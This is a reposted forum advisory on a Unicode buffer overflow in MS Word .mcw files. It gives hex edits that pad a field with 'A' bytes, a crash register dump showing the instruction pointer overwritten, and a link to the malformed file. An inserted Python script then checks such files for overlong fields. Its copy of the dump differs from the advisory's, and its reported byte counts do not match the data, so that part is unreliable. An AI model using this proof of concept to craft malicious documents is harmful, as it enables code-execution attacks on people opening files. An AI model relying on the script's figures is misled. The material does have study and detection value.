[Repost] UNICODE BUFFER OVERFLOW IN MS-WORD

Author: b_naamneh hotmail com

The unicode buffer overflow occurs when the user opens the malformed *.mcw document.

Proof of concept:
-----------------

Modify the *.mcw file with a binary (hex) editor as follows.

These lines were taken from the .mcw file:

------snip---mcw-file----
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00
00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77
------snip---------------

Change them as follows:
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73
------------
Quote:
EAX = 00000000 EBX = 00000000 ECX = 00000006
EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0
EIP = 00410041 ESP = 00126110 EBP = 00410041
EFL = 00000246
------------
* modified .mcw file can be downloaded from:
http://study.haifa.ac.il/~bnaamnih/word/foo.mcw
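As an added check (not part of the advisory or of the reposter's text), the Python below parses the two hex listings above, reads the length-prefixed "test" field and measures how many bytes a NUL-terminated copy would actually transfer from each version; it also decodes the faulting EIP value as UTF-16LE. The field layout (one length byte, the text, then a NUL separator), the offsets 0x21 and 0x27 / 0x8c for the "test" and " Bahaa" fields, and the reading that the crash comes from a copy that runs to the terminator rather than the declared length are all inferred from the dumps, not taken from any .mcw format documentation.

```python
import re

# Hex listings copied from the two snips above: the untouched record first,
# then the modified one with the run of 0x41 ('A') bytes.
ORIGINAL_DUMP = """
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00
00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77
"""

MODIFIED_DUMP = """
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73
"""

# Assumed layout, inferred from the dumps rather than from a .mcw spec:
# a one-byte length, the text, then a NUL separator. "test" (0x04 + 4 bytes)
# begins at offset 0x21 in both listings.
FIRST_FIELD_OFFSET = 0x21


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a whitespace-separated hex listing into raw bytes."""
    return bytes.fromhex(re.sub(r"\s+", "", dump))


def check_field(data: bytes, offset: int) -> tuple:
    """Return (declared_length, bytes_until_NUL) for the field at `offset`.

    The second value is what a terminator-driven copy would move. If the
    parser sizes its buffer from the length byte but copies up to the NUL
    (the reading these dumps suggest; the advisory does not state the root
    cause), the difference between the two numbers is the overflow."""
    declared = data[offset]
    text_start = offset + 1
    end = data.find(b"\x00", text_start)
    if end == -1:
        end = len(data)
    return declared, end - text_start


def is_overlong(data: bytes, offset: int, slack: int = 0) -> bool:
    """True when the text runs past its declared length (plus `slack`)."""
    declared, actual = check_field(data, offset)
    return actual > declared + slack


def decode_eip(eip: int) -> str:
    """Interpret a 32-bit register value as two UTF-16LE code units.

    0x00410041 sits in memory as 41 00 41 00, i.e. "AA": the ASCII 'A' run
    was widened to UTF-16 before it reached the saved return address, which
    is what makes this a *unicode* overflow."""
    return eip.to_bytes(4, "little").decode("utf-16-le")


if __name__ == "__main__":
    for name, dump in (("original", ORIGINAL_DUMP), ("modified", MODIFIED_DUMP)):
        data = hexdump_to_bytes(dump)
        declared, actual = check_field(data, FIRST_FIELD_OFFSET)
        flag = "OVERLONG" if is_overlong(data, FIRST_FIELD_OFFSET) else "ok"
        print(f"{name}: declared={declared} actual={actual} {flag}")
    print("EIP 0x00410041 decodes to", repr(decode_eip(0x00410041)))
```

Running it reports 4 declared / 4 actual for the original file and 4 declared / 105 actual for the modified one, while the " Bahaa" field that follows the run is still intact in both (6 / 6); the same `check_field` call can be pointed at any length-prefixed field in a suspect file to flag this mismatch before the document is opened.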

I was going to write an exploit, but then found out... *.mcw is for Mac.
Damn....